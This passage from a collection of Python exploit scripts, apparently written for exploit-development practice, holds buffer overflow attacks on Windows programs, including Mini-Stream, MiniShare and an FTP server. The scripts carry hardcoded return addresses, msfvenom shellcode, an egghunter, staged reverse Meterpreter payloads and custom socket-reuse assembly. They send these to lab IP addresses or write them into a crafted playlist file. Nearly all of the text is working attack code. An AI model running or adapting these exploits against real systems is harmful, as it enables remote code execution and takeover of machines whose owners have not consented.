50 | shellcode += "\x48\x74\x69\x4f\x70\x52\x4b\x73\x30\x39\x6f"
51 | shellcode += "\x39\x45\x53\x5a\x54\x4a\x33\x58\x4e\x4c\x36"
52 | shellcode += "\x70\x4b\x70\x4b\x70\x71\x78\x55\x52\x65\x50"
53 | shellcode += "\x37\x6e\x68\x4f\x4b\x39\x7a\x46\x62\x70\x70"
54 | shellcode += "\x50\x62\x70\x36\x30\x57\x30\x56\x30\x61\x50"
55 | shellcode += "\x36\x30\x32\x48\x6b\x5a\x64\x4f\x69\x4f\x39"
56 | shellcode += "\x70\x6b\x4f\x6a\x75\x6c\x57\x70\x6a\x44\x50"
57 | shellcode += "\x72\x76\x66\x37\x52\x48\x7a\x39\x4f\x55\x44"
58 | shellcode += "\x34\x65\x31\x6b\x4f\x79\x45\x6d\x55\x6b\x70"
59 | shellcode += "\x42\x54\x54\x4a\x6b\x4f\x42\x6e\x64\x48\x74"
60 | shellcode += "\x35\x68\x6c\x38\x68\x51\x77\x55\x50\x53\x30"
61 | shellcode += "\x47\x70\x42\x4a\x53\x30\x51\x7a\x46\x64\x63"
62 | shellcode += "\x66\x33\x67\x65\x38\x45\x52\x6a\x79\x79\x58"
63 | shellcode += "\x51\x4f\x6b\x4f\x6e\x35\x4f\x73\x49\x68\x77"
64 | shellcode += "\x70\x53\x4e\x70\x36\x6c\x4b\x77\x46\x61\x7a"
65 | shellcode += "\x63\x70\x30\x68\x77\x70\x46\x70\x75\x50\x77"
66 | shellcode += "\x70\x50\x56\x51\x7a\x57\x70\x70\x68\x43\x68"
67 | shellcode += "\x6e\x44\x61\x43\x68\x65\x79\x6f\x38\x55\x4e"
68 | shellcode += "\x73\x51\x43\x52\x4a\x73\x30\x31\x46\x71\x43"
69 | shellcode += "\x63\x67\x52\x48\x67\x72\x68\x59\x38\x48\x33"
70 | shellcode += "\x6f\x59\x6f\x38\x55\x4c\x43\x4c\x38\x77\x70"
71 | shellcode += "\x43\x4d\x61\x38\x36\x38\x53\x58\x57\x70\x61"
72 | shellcode += "\x50\x33\x30\x67\x70\x42\x4a\x65\x50\x52\x70"
73 | shellcode += "\x63\x58\x44\x4b\x76\x4f\x54\x4f\x34\x70\x39"
74 | shellcode += "\x6f\x79\x45\x56\x37\x33\x58\x73\x45\x32\x4e"
75 | shellcode += "\x62\x6d\x65\x31\x39\x6f\x49\x45\x31\x4e\x61"
76 | shellcode += "\x4e\x59\x6f\x74\x4c\x61\x34\x54\x4f\x6d\x55"
77 | shellcode += "\x74\x30\x49\x6f\x39\x6f\x79\x6f\x5a\x49\x4f"
78 | shellcode += "\x6b\x79\x6f\x59\x6f\x6b\x4f\x46\x61\x49\x53"
79 | shellcode += "\x64\x69\x78\x46\x61\x65\x4b\x71\x6f\x33\x4f"
80 | shellcode += "\x4b\x4c\x30\x68\x35\x79\x32\x42\x76\x31\x7a"
81 | shellcode += "\x35\x50\x56\x33\x69\x6f\x59\x45\x41\x41"
82 | 
83 | payload  = "A" * 2003
84 | payload += pack("<L",0x62501205)
85 | payload += shellcode
86 | payload += "D" * (3000 - len(payload))
87 | 
88 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
89 | s.connect((host, port))
90 | print s.recv(1024)
91 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
92 | 
93 | s.send("LTER /.:/" + payload)
94 | 
95 | s.close()
96 | 
97 | 


--------------------------------------------------------------------------------
/mini-stream.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | from struct import pack
 3 | 
 4 | evil_buffer = "A" * 17417
 5 | evil_buffer += pack("<L",0x100371f5)
 6 | evil_buffer += "JUNK"
 7 | 
 8 | # msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -b "\x00\x09\x0a" -f python
 9 | # bad character \x00\x09\x0a 
10 | buf =  ""
11 | buf += "\xda\xc4\xbd\x9b\xe7\x6b\x06\xd9\x74\x24\xf4\x5a\x2b"
12 | buf += "\xc9\xb1\x31\x31\x6a\x18\x83\xc2\x04\x03\x6a\x8f\x05"
13 | buf += "\x9e\xfa\x47\x4b\x61\x03\x97\x2c\xeb\xe6\xa6\x6c\x8f"
14 | buf += "\x63\x98\x5c\xdb\x26\x14\x16\x89\xd2\xaf\x5a\x06\xd4"
15 | buf += "\x18\xd0\x70\xdb\x99\x49\x40\x7a\x19\x90\x95\x5c\x20"
16 | buf += "\x5b\xe8\x9d\x65\x86\x01\xcf\x3e\xcc\xb4\xe0\x4b\x98"
17 | buf += "\x04\x8a\x07\x0c\x0d\x6f\xdf\x2f\x3c\x3e\x54\x76\x9e"
18 | buf += "\xc0\xb9\x02\x97\xda\xde\x2f\x61\x50\x14\xdb\x70\xb0"
19 | buf += "\x65\x24\xde\xfd\x4a\xd7\x1e\x39\x6c\x08\x55\x33\x8f"
20 | buf += "\xb5\x6e\x80\xf2\x61\xfa\x13\x54\xe1\x5c\xf8\x65\x26"
21 | buf += "\x3a\x8b\x69\x83\x48\xd3\x6d\x12\x9c\x6f\x89\x9f\x23"
22 | buf += "\xa0\x18\xdb\x07\x64\x41\xbf\x26\x3d\x2f\x6e\x56\x5d"
23 | buf += "\x90\xcf\xf2\x15\x3c\x1b\x8f\x77\x2a\xda\x1d\x02\x18"
24 | buf += "\xdc\x1d\x0d\x0c\xb5\x2c\x86\xc3\xc2\xb0\x4d\xa0\x3d"
25 | buf += "\xfb\xcc\x80\xd5\xa2\x84\x91\xbb\x54\x73\xd5\xc5\xd6"
26 | buf += "\x76\xa5\x31\xc6\xf2\xa0\x7e\x40\xee\xd8\xef\x25\x10"
27 | buf += "\x4f\x0f\x6c\x73\x0e\x83\xec\x5a\xb5\x23\x96\xa2"
28 | 
29 | evil_buffer += "\x90" * 50
30 | evil_buffer += buf
31 | evil_buffer += "C" * (18000 - len(evil_buffer)) 
32 | 
33 | payload = "http://" + evil_buffer
34 | 
35 | file_name = 'evil.pls'
36 | crash_file = open(file_name,'wb')
37 | crash_file.write(payload)
38 | crash_file.close()


--------------------------------------------------------------------------------
/minshare_fileserver.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | import socket
  3 | from struct import pack
  4 | from time import sleep
  5 | 
  6 | host = '172.16.192.177'
  7 | port = 80
  8 | 
  9 | max_size = 2000
 10 | eip_offset = 1786
 11 | 
 12 | # msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=ESI -a x86 --platform Windows -f python -v egg_hunter_esi
 13 | egg_hunter_esi =  ""
 14 | egg_hunter_esi += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
 15 | egg_hunter_esi += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
 16 | egg_hunter_esi += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
 17 | egg_hunter_esi += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
 18 | egg_hunter_esi += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
 19 | egg_hunter_esi += "\x4a\x49\x52\x46\x6f\x71\x79\x5a\x59\x6f"
 20 | egg_hunter_esi += "\x66\x6f\x72\x62\x76\x32\x72\x4a\x46\x62"
 21 | egg_hunter_esi += "\x71\x48\x6a\x6d\x66\x4e\x47\x4c\x56\x65"
 22 | egg_hunter_esi += "\x43\x6a\x43\x44\x48\x6f\x58\x38\x64\x37"
 23 | egg_hunter_esi += "\x74\x70\x54\x70\x33\x44\x6e\x6b\x38\x7a"
 24 | egg_hunter_esi += "\x6c\x6f\x71\x65\x6a\x4a\x6e\x4f\x32\x55"
 25 | egg_hunter_esi += "\x4a\x47\x6b\x4f\x4d\x37\x41\x41"
 26 | 
 27 | egghunter_alignment_esi  = ""
 28 | egghunter_alignment_esi += "\x54"   				#   PUSH ESP
 29 | egghunter_alignment_esi += "\x58"  					#   POP EAX
 30 | egghunter_alignment_esi += "\x2D\x45\x55\x55\x55"   #   SUB EAX,55555545
 31 | egghunter_alignment_esi += "\x2D\x45\x55\x55\x55"   #   SUB EAX,55555545
 32 | egghunter_alignment_esi += "\x2D\x46\x55\x55\x55"   #   SUB EAX,55555546
 33 | egghunter_alignment_esi += "\x50"   				#   PUSH EAX
 34 | egghunter_alignment_esi += "\x5E"  					#   POP ESI
 35 | 
 36 | rev_met_7887_edi =  ""
 37 | rev_met_7887_edi += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49"
 38 | rev_met_7887_edi += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
 39 | rev_met_7887_edi += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
 40 | rev_met_7887_edi += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
 41 | rev_met_7887_edi += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
 42 | rev_met_7887_edi += "\x4a\x49\x49\x6c\x4b\x58\x6f\x72\x55\x50"
 43 | rev_met_7887_edi += "\x63\x30\x65\x50\x73\x50\x4b\x39\x7a\x45"
 44 | rev_met_7887_edi += "\x45\x61\x6f\x30\x51\x74\x6c\x4b\x72\x70"
 45 | rev_met_7887_edi += "\x74\x70\x6e\x6b\x31\x42\x66\x6c\x6c\x4b"
 46 | rev_met_7887_edi += "\x73\x62\x64\x54\x6c\x4b\x72\x52\x34\x68"
 47 | rev_met_7887_edi += "\x46\x6f\x78\x37\x33\x7a\x56\x46\x35\x61"
 48 | rev_met_7887_edi += "\x59\x6f\x4c\x6c\x57\x4c\x43\x51\x33\x4c"
 49 | rev_met_7887_edi += "\x66\x62\x54\x6c\x65\x70\x49\x51\x6a\x6f"
 50 | rev_met_7887_edi += "\x74\x4d\x65\x51\x68\x47\x5a\x42\x68\x72"
 51 | rev_met_7887_edi += "\x50\x52\x73\x67\x4c\x4b\x46\x32\x62\x30"
 52 | rev_met_7887_edi += "\x4c\x4b\x50\x4a\x65\x6c\x6c\x4b\x70\x4c"
 53 | rev_met_7887_edi += "\x56\x71\x74\x38\x6b\x53\x43\x78\x45\x51"
 54 | rev_met_7887_edi += "\x6e\x31\x56\x31\x4e\x6b\x30\x59\x45\x70"
 55 | rev_met_7887_edi += "\x57\x71\x4e\x33\x4c\x4b\x61\x59\x77\x68"
 56 | rev_met_7887_edi += "\x4a\x43\x57\x4a\x43\x79\x6e\x6b\x56\x54"
 57 | rev_met_7887_edi += "\x4e\x6b\x76\x61\x39\x46\x46\x51\x59\x6f"
 58 | rev_met_7887_edi += "\x6e\x4c\x49\x51\x4a\x6f\x56\x6d\x35\x51"
 59 | rev_met_7887_edi += "\x79\x57\x74\x78\x39\x70\x70\x75\x58\x76"
 60 | rev_met_7887_edi += "\x76\x63\x61\x6d\x69\x68\x77\x4b\x51\x6d"
 61 | rev_met_7887_edi += "\x47\x54\x51\x65\x78\x64\x72\x78\x6c\x4b"
 62 | rev_met_7887_edi += "\x46\x38\x31\x34\x33\x31\x59\x43\x33\x56"
 63 | rev_met_7887_edi += "\x6c\x4b\x34\x4c\x70\x4b\x4e\x6b\x50\x58"
 64 | rev_met_7887_edi += "\x75\x4c\x67\x71\x49\x43\x6e\x6b\x75\x54"
 65 | rev_met_7887_edi += "\x6e\x6b\x73\x31\x4a\x70\x4c\x49\x63\x74"
 66 | rev_met_7887_edi += "\x67\x54\x77\x54\x43\x6b\x73\x6b\x43\x51"
 67 | rev_met_7887_edi += "\x36\x39\x31\x4a\x63\x61\x59\x6f\x69\x70"
 68 | rev_met_7887_edi += "\x73\x6f\x31\x4f\x52\x7a\x4c\x4b\x66\x72"
 69 | rev_met_7887_edi += "\x4a\x4b\x4e\x6d\x73\x6d\x30\x68\x65\x63"
 70 | rev_met_7887_edi += "\x67\x42\x37\x70\x65\x50\x33\x58\x30\x77"
 71 | rev_met_7887_edi += "\x64\x33\x57\x42\x71\x4f\x63\x64\x65\x38"
 72 | rev_met_7887_edi += "\x52\x6c\x34\x37\x66\x46\x35\x57\x6f\x79"
 73 | rev_met_7887_edi += "\x68\x68\x6b\x4f\x5a\x70\x4d\x68\x7a\x30"
 74 | rev_met_7887_edi += "\x73\x31\x37\x70\x37\x70\x66\x49\x58\x44"
 75 | rev_met_7887_edi += "\x30\x54\x70\x50\x53\x58\x54\x69\x4d\x50"
 76 | rev_met_7887_edi += "\x50\x6b\x33\x30\x79\x6f\x6a\x75\x70\x6a"
 77 | rev_met_7887_edi += "\x37\x7a\x43\x58\x4c\x6c\x56\x70\x69\x50"
 78 | rev_met_7887_edi += "\x4f\x43\x31\x78\x46\x62\x55\x50\x37\x6e"
 79 | rev_met_7887_edi += "\x5a\x6f\x4f\x79\x4d\x36\x66\x30\x66\x30"
 80 | rev_met_7887_edi += "\x76\x30\x36\x30\x51\x50\x42\x70\x37\x30"
 81 | rev_met_7887_edi += "\x32\x70\x33\x58\x48\x6a\x34\x4f\x39\x4f"
 82 | rev_met_7887_edi += "\x4b\x50\x79\x6f\x38\x55\x4a\x37\x50\x6a"
 83 | rev_met_7887_edi += "\x44\x50\x36\x36\x53\x67\x30\x68\x6e\x79"
 84 | rev_met_7887_edi += "\x49\x35\x31\x64\x50\x61\x59\x6f\x5a\x75"
 85 | rev_met_7887_edi += "\x6f\x75\x6f\x30\x50\x74\x76\x6a\x6b\x4f"
 86 | rev_met_7887_edi += "\x50\x4e\x56\x68\x54\x35\x68\x6c\x68\x68"
 87 | rev_met_7887_edi += "\x31\x77\x35\x50\x63\x30\x73\x30\x31\x7a"
 88 | rev_met_7887_edi += "\x77\x70\x43\x5a\x47\x74\x42\x76\x50\x57"
 89 | rev_met_7887_edi += "\x50\x68\x56\x62\x49\x49\x59\x58\x33\x6f"
 90 | rev_met_7887_edi += "\x79\x6f\x6a\x75\x4c\x43\x6b\x48\x67\x70"
 91 | rev_met_7887_edi += "\x63\x4e\x45\x66\x6e\x6b\x55\x66\x33\x5a"
 92 | rev_met_7887_edi += "\x63\x70\x50\x68\x55\x50\x34\x50\x77\x70"
 93 | rev_met_7887_edi += "\x77\x70\x66\x36\x51\x7a\x35\x50\x61\x78"
 94 | rev_met_7887_edi += "\x70\x58\x79\x34\x52\x73\x4d\x35\x4b\x4f"
 95 | rev_met_7887_edi += "\x78\x55\x6d\x43\x43\x63\x73\x5a\x53\x30"
 96 | rev_met_7887_edi += "\x31\x46\x53\x63\x52\x77\x75\x38\x67\x72"
 97 | rev_met_7887_edi += "\x69\x49\x38\x48\x63\x6f\x79\x6f\x69\x45"
 98 | rev_met_7887_edi += "\x6e\x63\x6b\x48\x63\x30\x31\x6d\x34\x68"
 99 | rev_met_7887_edi += "\x30\x58\x72\x48\x77\x70\x63\x70\x67\x70"
100 | rev_met_7887_edi += "\x65\x50\x42\x4a\x33\x30\x76\x30\x51\x78"
101 | rev_met_7887_edi += "\x34\x4b\x36\x4f\x54\x4f\x74\x70\x79\x6f"
102 | rev_met_7887_edi += "\x4b\x65\x52\x77\x72\x48\x34\x35\x52\x4e"
103 | rev_met_7887_edi += "\x30\x4d\x71\x71\x59\x6f\x4a\x75\x33\x6e"
104 | rev_met_7887_edi += "\x63\x6e\x6b\x4f\x44\x4c\x51\x34\x74\x4f"
105 | rev_met_7887_edi += "\x6f\x75\x52\x50\x49\x6f\x4b\x4f\x6b\x4f"
106 | rev_met_7887_edi += "\x79\x79\x6f\x6b\x6b\x4f\x49\x6f\x79\x6f"
107 | rev_met_7887_edi += "\x53\x31\x6f\x33\x61\x39\x78\x46\x63\x45"
108 | rev_met_7887_edi += "\x4a\x61\x79\x53\x4d\x6b\x7a\x50\x6d\x65"
109 | rev_met_7887_edi += "\x79\x32\x70\x56\x61\x7a\x53\x30\x33\x63"
110 | rev_met_7887_edi += "\x69\x6f\x78\x55\x41\x41"
111 | 
112 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
113 | s.connect((host, port))
114 | 
115 | payload  = "A" * 50
116 | payload += "w00tw00t"
117 | payload += rev_met_7887_edi
118 | payload += "A" * (eip_offset - len(payload))
119 | payload += pack("<L", 0x7c86467b) # JMP ESP Kernel32.dll
120 | payload += egghunter_alignment_esi
121 | payload += "A" * (48 - len(egghunter_alignment_esi))
122 | payload += egg_hunter_esi
123 | payload += "C" * (max_size - len(payload))
124 | 
125 | 
126 | request  = "GET /" + payload + " HTTP/1.1\r\n"
127 | request += "Host: 172.16.192.177\r\n"
128 | request += "Mozilla/5.0 (X11 Linux x86_64 rv:60.0 Gecko/20100101 Firefox/60.0\r\n"
129 | request += "Accept: text/html,application/xhtml+xml,application/xmlq=0.9,*/*q=0.8\r\n"
130 | request += "Accept-Language: enq=0.5\r\n"
131 | request += "Accept-Encoding: gzip, deflate\r\n"
132 | request += "Connection: close\r\n"
133 | request += "Upgrade-Insecure-Requests: 1\r\n"
134 | request += "\r\n"
135 | request += "\r\n"
136 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
137 | s.send(request)
138 | s.close()
139 | 


--------------------------------------------------------------------------------
/myftp.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | import socket
  3 | from struct import pack
  4 | from time import sleep
  5 | 
  6 | host = '172.16.192.168'
  7 | port = 21
  8 | 
  9 | max = 365
 10 | eip_offset = 294
 11 | esp_offset = 302
 12 | start_offset = 266
 13 | jmp_esp = pack("<L", 0x7e4456f7)
 14 | 
 15 | def fuzz(payload, port, recv=True):
 16 |   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 17 |   s.connect((host, port))
 18 |   if recv:
 19 |     s.recv(2048)
 20 |   s.send(payload)
 21 |   s.shutdown
 22 |   s.close
 23 | 
 24 | rev_met_7887 =  ""
 25 | rev_met_7887 += "\xd9\xeb\xd9\x74\x24\xf4\xbf\x39\x99\x73\xab"
 26 | rev_met_7887 += "\x5a\x31\xc9\xb1\x56\x83\xea\xfc\x31\x7a\x14"
 27 | rev_met_7887 += "\x03\x7a\x2d\x7b\x86\x57\xa5\xf9\x69\xa8\x35"
 28 | rev_met_7887 += "\x9e\xe0\x4d\x04\x9e\x97\x06\x36\x2e\xd3\x4b"
 29 | rev_met_7887 += "\xba\xc5\xb1\x7f\x49\xab\x1d\x8f\xfa\x06\x78"
 30 | rev_met_7887 += "\xbe\xfb\x3b\xb8\xa1\x7f\x46\xed\x01\xbe\x89"
 31 | rev_met_7887 += "\xe0\x40\x87\xf4\x09\x10\x50\x72\xbf\x85\xd5"
 32 | rev_met_7887 += "\xce\x7c\x2d\xa5\xdf\x04\xd2\x7d\xe1\x25\x45"
 33 | rev_met_7887 += "\xf6\xb8\xe5\x67\xdb\xb0\xaf\x7f\x38\xfc\x66"
 34 | rev_met_7887 += "\x0b\x8a\x8a\x78\xdd\xc3\x73\xd6\x20\xec\x81"
 35 | rev_met_7887 += "\x26\x64\xca\x79\x5d\x9c\x29\x07\x66\x5b\x50"
 36 | rev_met_7887 += "\xd3\xe3\x78\xf2\x90\x54\xa5\x03\x74\x02\x2e"
 37 | rev_met_7887 += "\x0f\x31\x40\x68\x13\xc4\x85\x02\x2f\x4d\x28"
 38 | rev_met_7887 += "\xc5\xa6\x15\x0f\xc1\xe3\xce\x2e\x50\x49\xa0"
 39 | rev_met_7887 += "\x4f\x82\x32\x1d\xea\xc8\xde\x4a\x87\x92\xb6"
 40 | rev_met_7887 += "\xbf\xaa\x2c\x46\xa8\xbd\x5f\x74\x77\x16\xc8"
 41 | rev_met_7887 += "\x34\xf0\xb0\x0f\x4d\x16\x43\xdf\xf5\x77\xbd"
 42 | rev_met_7887 += "\xe0\x05\x51\x7a\xb4\x55\xc9\xab\xb5\x3e\x09"
 43 | rev_met_7887 += "\x53\x60\xaa\x03\xc3\x27\x3a\xd4\xc5\x50\x38"
 44 | rev_met_7887 += "\xd4\xf7\x6f\xb5\x32\x57\x20\x95\xea\x18\x90"
 45 | rev_met_7887 += "\x55\x5b\xf1\xfa\x5a\x84\xe1\x04\xb1\xad\x88"
 46 | rev_met_7887 += "\xea\x6f\x85\x24\x92\x2a\x5d\xd4\x5b\xe1\x1b"
 47 | rev_met_7887 += "\xd6\xd0\x03\xdb\x99\x10\x66\xcf\xce\x46\x88"
 48 | rev_met_7887 += "\x0f\x0f\xe3\x88\x65\x0b\xa5\xdf\x11\x11\x90"
 49 | rev_met_7887 += "\x17\xbe\xea\xf7\x24\xb9\x15\x86\x1c\xb1\x20"
 50 | rev_met_7887 += "\x1c\x20\xad\x4c\xf0\xa0\x2d\x1b\x9a\xa0\x45"
 51 | rev_met_7887 += "\xfb\xfe\xf3\x70\x04\x2b\x60\x29\x91\xd4\xd0"
 52 | rev_met_7887 += "\x9d\x32\xbd\xde\xf8\x75\x62\x21\x2f\x06\x65"
 53 | rev_met_7887 += "\xdd\xad\x21\xce\xb5\x4d\x72\xee\x45\x24\x72"
 54 | rev_met_7887 += "\xbe\x2d\xb3\x5d\x31\x9d\x3c\x74\x1a\xb5\xb7"
 55 | rev_met_7887 += "\x19\xe8\x24\xc7\x33\xac\xf8\xc8\xb0\x75\x0b"
 56 | rev_met_7887 += "\xb2\xb9\x8a\xec\x43\xd0\xee\xed\x43\xdc\x10"
 57 | rev_met_7887 += "\xd2\x95\xe5\x66\x15\x26\x52\x78\x20\x0b\xf3"
 58 | rev_met_7887 += "\x13\x4a\x1f\x03\x36"
 59 | 
 60 | ###################### SOCKET(2,1,6) ###################################
 61 | block1 = "\x83\xEC\x7C"           # SUB ESP,7C; 
 62 | block1 += "\xBB\x44\x34\x34\x40"  # MOV EBX,40343444
 63 | block1 += "\xC1\xEB\x08"          # SHR EBX,8
 64 | block1 += "\xB0\x06\x50"          # MOV AL,6; PUSH EAX
 65 | block1 += "\xB0\x01\x50"          # MOV AL,1; PUSH EAX
 66 | block1 += "\x40\x50"              # MOV AL,2; PUSH EAX
 67 | block1 += "\xFF\xD3"              # CALL EBX - 
 68 | 
 69 | ###################### BIND(Handle:EDI,SocketAddr:ECX,Length:10) ########
 70 | block1 += "\x8B\xF8"              # MOV EDI,EAX
 71 | block1 += "\x8B\xCB"              # MOV ECX,EBX
 72 | block1 += "\xB5\x74"              # MOV CH,74; GET SOCKET ADDR 
 73 | block1 += "\xFE\x41\x03"          # INC BYTE PTR DS:[ECX+3]; Incr Port #
 74 | block1 += "\xB3\x54"              # MOV BL,54; Points to Bind; 
 75 | block1 += "\x6A\x10"              # PUSH 10
 76 | block1 += "\x51"                  # PUSH ECX
 77 | block1 += "\x57"                  # PUSH EDI
 78 | block1 += "\xFF\xD3" 
 79 | 
 80 | ###################### Listen(Backlog, Handler) ########################## 
 81 | block1 += "\xB3\x5C"              # MOV BL,5C
 82 | block1 += "\x6A\x7F"              # PUSH 7F
 83 | block1 += "\x57"                  # PUSH EDI
 84 | block1 += "\xFF\xD3"              # CALL EBX
 85 | 
 86 | ###################### Accept(Handler, NULL, NULL) ########################
 87 | block1 += "\xB3\x24"              # MOV BL,24
 88 | block1 += "\x57"                  # PUSH EDI
 89 | block1 += "\xFF\xD3"              # CALL EBX
 90 | 
 91 | ###################### Malloc(Handler, NULL, NULL) ######################## 
 92 | 
 93 | block1 += "\x8B\xF8"              # MOV EDI,EAX
 94 | block1 += "\x66\xBB\xD4\x3D"      # MOV BX,3DD4
 95 | block1 += "\x8A\xE0"              # MOV AH, AL ; Size Fudging for Malloc
 96 | block1 += "\x50"                  # PUSH EAX
 97 | block1 += "\xFF\xD3"              # CALL EBX; 
 98 | block1 += "\xEB\x9D"              # JMP to block2 
 99 | 
100 | ###################### VirtualProtect ######################## 
101 | block2 = "\x59"                   #    POP ECX
102 | block2 += "\x51"                  #    PUSH ECX
103 | block2 += "\x8B\xF0"              #    MOV ESI,EAX
104 | block2 += "\x50"                  #    PUSH EAX
105 | block2 += "\x66\xBB\xA4\x3E"      #    MOV BX,3EA4
106 | block2 += "\x8D\x44\x24\xDC"      #    LEA EAX,DWORD PTR SS:[ESP+24]
107 | block2 += "\x50"                  #    PUSH EAX
108 | block2 += "\x6A\x40"              #    PUSH 40
109 | block2 += "\x51"                  #    PUSH ECX
110 | block2 += "\x56"                  #    PUSH ESI
111 | block2 += "\xFF\xD3"              #    CALL EBX
112 | 
113 | ###################### Recv ######################## 
114 | block2 += "\x66\xBB\xDC\x82"      # MOV BX, 0x82DC
115 | block2 += "\x57"                  # PUSH EDI
116 | block2 += "\xEB\x05"              # CALL EBX
117 | 
118 | tucked = "\xFF\x13"               # CALL [EBX]
119 | tucked += "\xFF\xE6"              # JMP ESI
120 | 
121 | payload = "Z" * start_offset
122 | payload += block2
123 | payload += "D" * (eip_offset - len(payload))
124 | payload += jmp_esp
125 | payload += tucked 
126 | payload += block1
127 | payload += "E" * (max - len(payload))
128 | 
129 | print "[*] payload {0} chars...".format(len(payload))
130 | fuzz(payload, port)
131 | sleep(1)
132 | fuzz(rev_met_7887, port+1, False)
133 | 
134 | # 00403434   $-FF25 E4824000  JMP DWORD PTR DS:[<&WS2_32.socket>]      ;  WS2_32.socket (2, 1 ,6)
135 | # 00403454   $-FF25 B8824000  JMP DWORD PTR DS:[<&WS2_32.bind>]        ;  WS2_32.bind
136 | # 0040345C   $-FF25 D4824000  JMP DWORD PTR DS:[<&WS2_32.listen>]      ;  WS2_32.listen
137 | # 00403424   $-FF25 B4824000  JMP DWORD PTR DS:[<&WS2_32.accept>]      ;  WS2_32.accept
138 | # 0040340C   $-FF25 DC824000  JMP DWORD PTR DS:[<&WS2_32.recv>]        ;  WS2_32.recv
139 | # 00403DD4   $-FF25 70824000  JMP DWORD PTR DS:[<&msvcrt.malloc>]      ;  msvcrt.malloc
140 | # 00403EA4   $-FF25 E4814000  JMP DWORD PTR DS:[<&KERNEL32.VirtualProt>;  kernel32.VirtualProtect
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 


--------------------------------------------------------------------------------
/myftp_recreate_socket.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | import socket
  3 | from struct import pack
  4 | from time import sleep
  5 | 
  6 | host = '172.16.192.168'
  7 | port = 21
  8 | 
  9 | max = 365
 10 | eip_offset = 294
 11 | esp_offset = 302
 12 | start_offset = 266
 13 | jmp_esp = pack("<L", 0x7e4456f7)
 14 | 
 15 | def fuzz(payload, port, recv=True):
 16 |   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 17 |   s.connect((host, port))
 18 |   if recv:
 19 |     s.recv(2048)
 20 |   s.send(payload)
 21 |   s.shutdown
 22 |   s.close
 23 | 
 24 | rev_met_7887 =  ""
 25 | rev_met_7887 += "\xd9\xeb\xd9\x74\x24\xf4\xbf\x39\x99\x73\xab"
 26 | rev_met_7887 += "\x5a\x31\xc9\xb1\x56\x83\xea\xfc\x31\x7a\x14"
 27 | rev_met_7887 += "\x03\x7a\x2d\x7b\x86\x57\xa5\xf9\x69\xa8\x35"
 28 | rev_met_7887 += "\x9e\xe0\x4d\x04\x9e\x97\x06\x36\x2e\xd3\x4b"
 29 | rev_met_7887 += "\xba\xc5\xb1\x7f\x49\xab\x1d\x8f\xfa\x06\x78"
 30 | rev_met_7887 += "\xbe\xfb\x3b\xb8\xa1\x7f\x46\xed\x01\xbe\x89"
 31 | rev_met_7887 += "\xe0\x40\x87\xf4\x09\x10\x50\x72\xbf\x85\xd5"
 32 | rev_met_7887 += "\xce\x7c\x2d\xa5\xdf\x04\xd2\x7d\xe1\x25\x45"
 33 | rev_met_7887 += "\xf6\xb8\xe5\x67\xdb\xb0\xaf\x7f\x38\xfc\x66"
 34 | rev_met_7887 += "\x0b\x8a\x8a\x78\xdd\xc3\x73\xd6\x20\xec\x81"
 35 | rev_met_7887 += "\x26\x64\xca\x79\x5d\x9c\x29\x07\x66\x5b\x50"
 36 | rev_met_7887 += "\xd3\xe3\x78\xf2\x90\x54\xa5\x03\x74\x02\x2e"
 37 | rev_met_7887 += "\x0f\x31\x40\x68\x13\xc4\x85\x02\x2f\x4d\x28"
 38 | rev_met_7887 += "\xc5\xa6\x15\x0f\xc1\xe3\xce\x2e\x50\x49\xa0"
 39 | rev_met_7887 += "\x4f\x82\x32\x1d\xea\xc8\xde\x4a\x87\x92\xb6"
 40 | rev_met_7887 += "\xbf\xaa\x2c\x46\xa8\xbd\x5f\x74\x77\x16\xc8"
 41 | rev_met_7887 += "\x34\xf0\xb0\x0f\x4d\x16\x43\xdf\xf5\x77\xbd"
 42 | rev_met_7887 += "\xe0\x05\x51\x7a\xb4\x55\xc9\xab\xb5\x3e\x09"
 43 | rev_met_7887 += "\x53\x60\xaa\x03\xc3\x27\x3a\xd4\xc5\x50\x38"
 44 | rev_met_7887 += "\xd4\xf7\x6f\xb5\x32\x57\x20\x95\xea\x18\x90"
 45 | rev_met_7887 += "\x55\x5b\xf1\xfa\x5a\x84\xe1\x04\xb1\xad\x88"
 46 | rev_met_7887 += "\xea\x6f\x85\x24\x92\x2a\x5d\xd4\x5b\xe1\x1b"
 47 | rev_met_7887 += "\xd6\xd0\x03\xdb\x99\x10\x66\xcf\xce\x46\x88"
 48 | rev_met_7887 += "\x0f\x0f\xe3\x88\x65\x0b\xa5\xdf\x11\x11\x90"
 49 | rev_met_7887 += "\x17\xbe\xea\xf7\x24\xb9\x15\x86\x1c\xb1\x20"
 50 | rev_met_7887 += "\x1c\x20\xad\x4c\xf0\xa0\x2d\x1b\x9a\xa0\x45"
 51 | rev_met_7887 += "\xfb\xfe\xf3\x70\x04\x2b\x60\x29\x91\xd4\xd0"
 52 | rev_met_7887 += "\x9d\x32\xbd\xde\xf8\x75\x62\x21\x2f\x06\x65"
 53 | rev_met_7887 += "\xdd\xad\x21\xce\xb5\x4d\x72\xee\x45\x24\x72"
 54 | rev_met_7887 += "\xbe\x2d\xb3\x5d\x31\x9d\x3c\x74\x1a\xb5\xb7"
